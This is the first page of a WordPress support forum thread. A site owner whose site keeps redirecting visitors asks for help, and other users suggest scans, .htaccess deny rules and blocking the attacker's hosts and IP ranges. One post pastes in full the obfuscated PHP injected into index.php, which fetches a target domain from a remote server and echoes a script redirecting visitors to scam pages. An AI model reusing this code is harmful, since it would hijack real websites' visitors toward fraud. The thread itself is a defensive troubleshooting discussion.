Title: Got hacked Last modified: June 27, 2018 --- # Got hacked * Resolved [kirai](https://wordpress.org/support/users/kirai/) * (@kirai) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/) * It seems there is some code inserted somewhere… it randomly redirects users to an external website, but it does it only one time per session. * redirects to external website but [http://www.a](http://www.a) works. Clicking on the top menu links also redirects to external webiste * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fgot-hacked-7%2F%3Foutput_format%3Dmd&locale=en_US) to see the link]_ Viewing 15 replies - 1 through 15 (of 24 total) 1 [2](https://wordpress.org/support/topic/got-hacked-7/page/2/?output_format=md) [→](https://wordpress.org/support/topic/got-hacked-7/page/2/?output_format=md) * [a2hostingrj](https://wordpress.org/support/users/a2hostingrj/) * (@a2hostingrj) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10440075) * Perform a scan with WordFence * > [https://wordpress.org/plugins/wordfence/](https://wordpress.org/plugins/wordfence/) * This will check for any malicious code in your site., * Also, check your .htaccess, and change all your passwords (WordPress, Hosting, FTP) * Thread Starter [kirai](https://wordpress.org/support/users/kirai/) * (@kirai) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10443928) * Thank you!!! * Thread Starter [kirai](https://wordpress.org/support/users/kirai/) * (@kirai) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10446996) * Reopening since the problem persists. * – I reinstalled wordpress – Reviewed .htaccess file (no issues with it) – Installed Wordfence and run the scan (no issues with it) – Changed all passwords: ftp, hosting, wordpress to superlong ones 🙂 * Still getting a redirect to external site when loading [http://www.ageekinjapan.com](http://www.ageekinjapan.com)( First time once per session?), Opening a private window on the browser and opening the site ) * Thread Starter [kirai](https://wordpress.org/support/users/kirai/) * (@kirai) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10447005) * Fixed the problem again… I thin… My index.php file had code inserted at the beginning starting like this: * ``` Order Deny,Allow Deny from All Allow from ##.###.##.### Allow from ##.##.## Allow from ##.##.## Allow from ##.##.## Deny from ##.##.## * Order Deny,Allow Deny from All * Same IP list above * Order Deny,Allow Deny from All * same again ending ip list with Allow from env=REDIRECT_STATUS=200 * toss this in too * Options -Indexes Order Deny,Allow Deny from all * [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/) * (@afleetingglimpse) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10466146) * this will not help if they are crossing from a trust with the host server but if it’s an outside attack and they are getting in and changing files, this may block the access to those files they need to change to modify your site. * I had a few issues where they got into my site and changed the front page, they changed user names and access.. * I did all the same of changing passwords and credentials bu they were back in in 15 days. (with wordfence on) and yes when they hacked in they turned the plugins off. * this, though a pain to have to update IP’s whenever I travel somewhere, has secured my site for now.. (last 8 months) * Thread Starter [kirai](https://wordpress.org/support/users/kirai/) * (@kirai) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10478217) * Hello, thank you @afleetinglimpse! * Unfortunately I added all those rules to my .httaccess and changed all passwords again. After several ours they inserted the code again the first line of my index. php, this means that they are not really logging in to insert the code? - This reply was modified 7 years, 10 months ago by [kirai](https://wordpress.org/support/users/kirai/). * Thread Starter [kirai](https://wordpress.org/support/users/kirai/) * (@kirai) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10487641) * This is the complete line of code that is being inserted in my index.php, now it seems to be happening several times per 24 hours. * ``` =60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');} ``` - This reply was modified 7 years, 10 months ago by [kirai](https://wordpress.org/support/users/kirai/). * [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/) * (@afleetingglimpse) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488338) * may want to put a block on the server calling * ht tp: //roi777.com - This reply was modified 7 years, 10 months ago by [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/). * [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/) * (@afleetingglimpse) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488379) * calling out of the IP for king-servers.com. * 162.244, range but with multiple servers I would start by blacklisting the whole range. * if it still gets replaced or you want to do more work first.. this shows 12 IP ranges those US based servers use. * [https://awebanalysis.com/en/ipv4-as-name-directory/http%3A-slash–slash-king-servers.com/](https://awebanalysis.com/en/ipv4-as-name-directory/http%3A-slash–slash-king-servers.com/) * [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/) * (@afleetingglimpse) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488447) * looking at a page that had the code on it prior. it is now a fake windows virus/ windows defender scam page. * Since it’s calling w ww.evange lizabrasil.com (2 manual brakes added by me) * I would also specifically block that. Not that I am sure thats an issue but it seems that the $z8c7dd922ad47 is calling the index on that site. and being the front landing page is hacked.. blocking it is a good idea anyway. * I am not an expert, maybe someone else will pop in with more help. * [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/) * (@afleetingglimpse) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488467) * “this means that they are not really logging in to insert the code?” * from what I can see, no. * a code is hidden on your box somewhere are is being called at specific times. it seems to look at the index and if the timestamp changed it calls out and pulls the changes from another machine. * i effect they are not breaking in, your machine is calling out to grant them access again. * since it is so common several times per 24 hours, I would clear and log all external IP calls. * wordfence is not telling you the admin has been accessed or the index is changed because when the machine pulls the info no login happened. and it disables WF before changing the index so you don’t get an alert. * Thread Starter [kirai](https://wordpress.org/support/users/kirai/) * (@kirai) * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10497493) * Hello! I added all the ips and ip ranges of the suspicious sites mentioned and it stoped it for more than 48 hours… but now the inserted code is back again. * Any more ideas of what I should do? Viewing 15 replies - 1 through 15 (of 24 total) 1 [2](https://wordpress.org/support/topic/got-hacked-7/page/2/?output_format=md) [→](https://wordpress.org/support/topic/got-hacked-7/page/2/?output_format=md) The topic ‘Got hacked’ is closed to new replies. ## Tags * [hacked](https://wordpress.org/support/topic-tag/hacked/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 24 replies * 4 participants * Last reply from: [kirai](https://wordpress.org/support/users/kirai/) * Last activity: [7 years, 9 months ago](https://wordpress.org/support/topic/got-hacked-7/page/2/#post-10606410) * Status: resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics